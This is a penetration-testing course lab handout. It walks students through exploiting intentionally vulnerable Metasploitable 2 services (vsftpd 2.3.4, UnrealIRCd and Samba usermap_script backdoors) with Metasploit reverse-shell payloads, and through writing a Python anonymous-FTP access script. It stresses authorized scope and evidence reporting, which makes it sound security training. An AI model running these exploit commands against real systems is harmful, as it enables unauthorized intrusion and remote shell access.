Week 7 graded lab. First exploitation lab. Authorized practice ranges only. Evidence required for every exploit.
Learning objectives
- Apply Metasploit modules to exploit known vulnerabilities on authorized targets
- Read public exploit code (searchsploit / Exploit-DB) and understand the vulnerability mechanism before running
- Write a Python script to exploit a misconfiguration without a framework
- Produce a lab report with reproducible evidence for each finding
Authorization
Targets:
- Metasploitable 2 -- your local VM on the lab network (Host-Only). All ports and services are intentionally vulnerable and authorized to exploit.
- HackTheBox retired machines (if HTB access provided) -- via HTB VPN only; authorized by the HTB platform's terms of service.
CRITICAL: Before starting any exploit, confirm in writing in your lab session log: the target IP, the authorized scope, and the authorization basis (lab VM / HTB platform authorization). This is not a formality -- it is the professional habit the capstone requires.
Not authorized:
- Any system outside the lab IP range or HTB VPN tunnel
- Denial-of-service payloads
- Persistent backdoors that survive a VM reset
Pre-lab setup
Verify the lab environment:
# Terminal session logging -- START THIS FIRST:
mkdir -p ~/pen101-workspace/lab-07
script -a ~/pen101-workspace/lab-07/session.log
# Confirm lab network connectivity:
ping -c 3 <metasploitable2-ip>
# Start Metasploit:
msfconsole
Leave script running for the entire lab session. Every command and output is captured.
Exercise 1: vsftpd 2.3.4 backdoor (CVE-2011-2523)
Step 1: Confirm the service version
Before exploiting, verify that the target is actually running the vulnerable version:
nmap -sV -p 21 <metasploitable2-ip>
# Expected: vsftpd 2.3.4
Record the Nmap output in your lab report. The version match between the scanner and the CVE is what makes this a verified finding.
Step 2: Exploit with Metasploit
msfconsole
msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS <metasploitable2-ip>
msf6 exploit(vsftpd_234_backdoor) > run
If the exploit succeeds, you receive a shell. Immediately run:
id && whoami && hostname && uname -a
Screenshot this output. This is the proof-of-exploitation artifact.
Step 3: Understand the exploit mechanism
searchsploit vsftpd 2.3.4
searchsploit -m 17491 # copy the exploit to your current directory
cat 17491.rb # read the Metasploit module source
Read the module source. In your lab report, write a paragraph answering: what network action does the exploit perform? What is the backdoor? Why does it work without authentication?
Exercise 2: UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075)
Step 1: Confirm the service
nmap -sV -p 6667 <metasploitable2-ip>
# Expected: UnrealIRCd
Step 2: Exploit
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unreal_ircd_3281_backdoor) > set RHOSTS <metasploitable2-ip>
msf6 exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse
msf6 exploit(unreal_ircd_3281_backdoor) > set LHOST <kali-ip>
msf6 exploit(unreal_ircd_3281_backdoor) > run
Proof screenshot: id && hostname
Step 3: Understand the mechanism
Look up CVE-2010-2075 on the NVD. Read the description. In your lab report: what was the backdoor, who introduced it, and what does it do at the network level? What does "supply chain compromise" mean in this context?
Exercise 3: Samba "username map script" (CVE-2007-2447)
Step 1: Confirm Samba
nmap -sV -p 445 <metasploitable2-ip>
# Expected: Samba 3.x.x
Step 2: Exploit
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(usermap_script) > set RHOSTS <metasploitable2-ip>
msf6 exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
msf6 exploit(usermap_script) > set LHOST <kali-ip>
msf6 exploit(usermap_script) > run
Proof screenshot: id && hostname
Step 3: The command injection mechanism
The vulnerability is in Samba's username map script feature. When enabled, Samba passes the username to a shell script for mapping. If the username contains shell metacharacters, they are executed. Write a one-paragraph explanation of what "command injection" means at the operating system level. What is the injection point? What is the injected command?
Exercise 4: Manual Python -- FTP anonymous login
No Metasploit, no public exploit. A misconfiguration finding, not a CVE.
Step 1: Verify anonymous login manually
ftp <metasploitable2-ip>
# At Name prompt: anonymous
# At Password prompt: any string (e.g., test@test.com)
# If successful: run ls, then pwd
Step 2: Write the Python script
Write a Python script using ftplib that:
- Connects to the Metasploitable 2 FTP server
- Logs in as anonymous
- Lists the root FTP directory contents
- Downloads one file and saves it locally
- Prints the list of files and the content of the downloaded file
#!/usr/bin/env python3
from ftplib import FTP
import os
TARGET_IP = "<metasploitable2-ip>"
def main():
ftp = FTP(TARGET_IP)
ftp.login(user='anonymous', passwd='lab@virtusacademy.org')
print("[+] Logged in as anonymous")
# List root directory
files = []
ftp.retrlines('LIST', files.append)
print("[+] Directory listing:")
for f in files:
print(f)
# Download the first file found
# (modify to target a specific file if the listing suggests an interesting one)
ftp.quit()
if __name__ == '__main__':
main()
Extend the script to download a file (use ftp.retrbinary()). The FTP root on Metasploitable 2 contains files; retrieve one and document its contents.
Step 3: Document the finding
This is not a CVE -- it is a misconfiguration. In your lab report, write the finding as you would for a client report:
- Finding title: "FTP Anonymous Login Enabled"
- CVSS v3.1 score: compute it. (AV:N, AC:L, PR:N, UI:N, S:U -- what are the C/I/A impacts given what you were able to access?)
- Description, Evidence, Business Impact, Remediation
Deliverable
A lab report with four sections (one per exercise) containing:
- The CVE number and NVD link (or "N/A -- misconfiguration" for Exercise 4)
- The exact commands run (copy from your
session.log) - The proof-of-exploitation screenshot
- A paragraph describing the vulnerability mechanism
Appendix: the session.log file from your script session.
Stop the session log
When finished:
exit # exits the script session
# lab-07/session.log now contains your full terminal transcript